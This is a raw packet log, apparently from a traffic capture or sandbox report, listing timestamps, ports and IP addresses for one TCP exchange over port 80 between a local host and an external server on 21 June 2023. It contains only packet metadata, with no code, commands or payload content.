Jun 21, 2023 04:27:58.170376062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170422077 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170429945 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.170468092 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170471907 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.170516014 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170562983 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170598984 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.170608997 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170655012 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170675993 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.170702934 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170747995 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170793056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170799017 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.170838118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170882940 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170887947 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.170928001 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170939922 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.170974016 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171020031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171035051 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.171066046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171111107 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171125889 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.171158075 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171202898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171219110 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.171247005 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171293020 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171338081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171340942 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.171385050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171406031 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.171432972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171478033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171490908 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.171526909 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171571970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171605110 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.171616077 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171660900 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171705008 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171710968 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.171751976 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171761990 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.171797991 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171844006 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171874046 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.171890020 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171936035 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.171967983 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.171981096 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172028065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172072887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172081947 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.172131062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172144890 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.172178030 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172223091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172239065 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.172292948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172344923 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172390938 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172410965 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.172436953 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172502041 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172554970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172605038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172648907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172658920 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.172694921 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172740936 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172785997 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.172786951 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172832012 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172877073 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172888041 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.172921896 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172966957 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.172977924 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.173027039 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.196758986 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.199436903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.199496031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.199543953 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.199578047 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.199589968 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.199636936 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.199683905 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.199682951 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.199736118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.199743986 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.199784040 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.199830055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.199877024 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.199889898 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.199924946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.199970961 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.199980021 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.200016022 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200020075 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.200062037 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200109959 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200129032 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.200158119 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200203896 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200208902 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.200248957 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200304031 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.200319052 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200381994 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200428009 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200473070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200486898 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.200520992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200544119 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.200567007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200612068 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200656891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200673103 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.200704098 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200735092 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.200748920 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200795889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200840950 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.200860977 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200918913 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.200946093 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.200965881 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201009035 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201051950 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.201055050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201101065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201143980 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.201145887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201194048 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201237917 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201268911 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.201282978 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201298952 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.201328039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201374054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201411009 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.201419115 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201467037 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201498032 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.201514006 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201558113 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201601028 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201611996 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.201643944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201670885 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.201689959 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201734066 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201781034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201802969 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.201824903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201848984 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.201869965 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201911926 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201957941 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.201962948 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.202001095 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202028990 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.202045918 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202089071 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202121019 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.202158928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202204943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202248096 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202272892 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.202292919 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202339888 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202373981 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.202380896 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202425957 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202446938 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.202470064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202517033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202538967 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.202563047 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202605963 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202622890 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.202651024 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202693939 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202712059 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.202735901 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202781916 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202788115 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.202826023 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202871084 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202884912 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.202914953 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202958107 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.202971935 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.203001976 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203047037 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203066111 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.203088999 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203114986 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.203131914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203176022 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203191996 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.203223944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203268051 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203285933 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.203313112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203356028 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203378916 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.203402042 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203444004 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203490019 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203495979 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.203535080 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203581095 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203588009 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.203628063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203674078 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203685999 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.203716993 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203763008 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.203767061 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.204122066 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.232151031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.232219934 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.232300043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.232342005 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.232346058 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.232389927 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.232410908 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.232438087 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.232486010 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.232520103 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.232537031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.232584953 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.232601881 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.232631922 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.232678890 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.232685089 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.232726097 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.232770920 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.232778072 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.232817888 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.232863903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.232877016 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.232908964 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.232954979 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.232980013 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.233000994 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233048916 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233056068 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.233095884 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233139992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233159065 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.233186960 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233232975 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233278036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233287096 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.233324051 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233370066 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233385086 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.233417034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233463049 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233477116 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.233508110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233556032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233566046 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.233602047 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233645916 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233664989 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.233690977 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233736992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233783007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233828068 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233871937 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233877897 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.233877897 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.233916998 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233962059 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.233978033 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.234006882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234051943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234065056 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.234097958 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234142065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234190941 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234200001 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.234236002 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234282017 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234293938 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.234327078 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234371901 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234385014 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.234416962 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234427929 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.234462976 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234508991 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234520912 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.234558105 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234601021 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234611988 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.234647036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234693050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234736919 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234738111 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.234801054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234854937 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234855890 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.234901905 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234947920 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234966993 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.234992981 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.234996080 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.235038996 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235085011 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235097885 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.235131025 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235177040 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235192060 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.235222101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235268116 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235316038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235321999 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.235363007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235409021 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235425949 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.235455036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235500097 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235507965 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.235548019 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.235594034 CEST	80	49719	45.9.74.80	192.168.2.3
